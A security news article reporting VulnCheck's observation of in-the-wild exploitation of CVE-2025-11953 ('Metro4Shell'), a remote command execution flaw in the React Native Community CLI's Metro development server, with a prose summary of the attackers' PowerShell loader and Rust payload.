Threat actors have been exploiting a critical-severity React Native vulnerability in attacks since late December, VulnCheck warns.
Tracked as CVE-2025-11953 (CVSS score of 9.8) and disclosed in early November, the bug impacts the highly popular React Native Community CLI NPM package (@react-native-community/cli), which has roughly two million weekly downloads.
It is part of the React Native Community CLI project, which was extracted from the open source framework for improved maintainability, and provides a set of command-line tools for app building.
While CVE-2025-11953 and other vulnerabilities impacting development servers are typically exploitable only from the developer’s local machine, a second issue in React Native exposes the servers to external attackers, software supply chain security firm JFrog warned in November.
Now, VulnCheck mirrors the warning after observing in-the-wild exploitation of the CVE, despite limited public attention.
“As of late January, public discussion largely frames CVE-2025-11953 as a theoretical risk rather than an active intrusion vector. This disconnect is where defenders are most likely to be caught unprepared,” VulnCheck notes in a fresh report.
The vulnerability intelligence firm, which has named the bug Metro4Shell, observed initial exploitation attempts on December 21, followed by more activity on January 4 and 21, suggesting continuous operational use. Thousands of internet-accessible React Native instances could be at risk.
“This gap between observed exploitation and wider recognition matters, particularly for vulnerabilities that are easy to exploit and, as internet-wide search data shows, exposed on the public internet,” VulnCheck says.
According to the company, the Metro4Shell React Native vulnerability resides within Metro, the JavaScript bundler and development server that React Native apps use in the development and testing stages.
By default, Metro can bind to external interfaces, exposing deployments to unauthenticated, remote OS command execution via simple POST requests.
VulnCheck observed the attackers deploying a multi-stage PowerShell-based loader designed to disable Microsoft Defender protections, establish a raw TCP connection to the attackers’ host, send a GET request and receive a payload, and execute the downloaded payload.
“This same methodology was observed across multiple attacks. The deliberate disabling of Microsoft Defender protections before payload retrieval indicates the attacker anticipated the presence of endpoint security controls and incorporated evasion measures into the initial execution flow,” VulnCheck notes.
The final payload is written in Rust and has a basic anti-analysis logic. VulnCheck has observed payloads targeting both Windows and Linux systems.
“CVE-2025-11953 is not remarkable because it exists. It is remarkable because it reinforces a pattern defenders continue to relearn. Development infrastructure becomes production infrastructure the moment it is reachable, regardless of intent,” VulnCheck notes.
Related: RondoDox Botnet Exploiting React2Shell Vulnerability
Related: Google Sees 5 Chinese Groups Exploiting React2Shell for Malware Delivery
Related: Open VSX Publisher Account Hijacked in Fresh GlassWorm Attack
Related: Cyber Insights 2026: Malware and Cyberattacks in the Age of AI
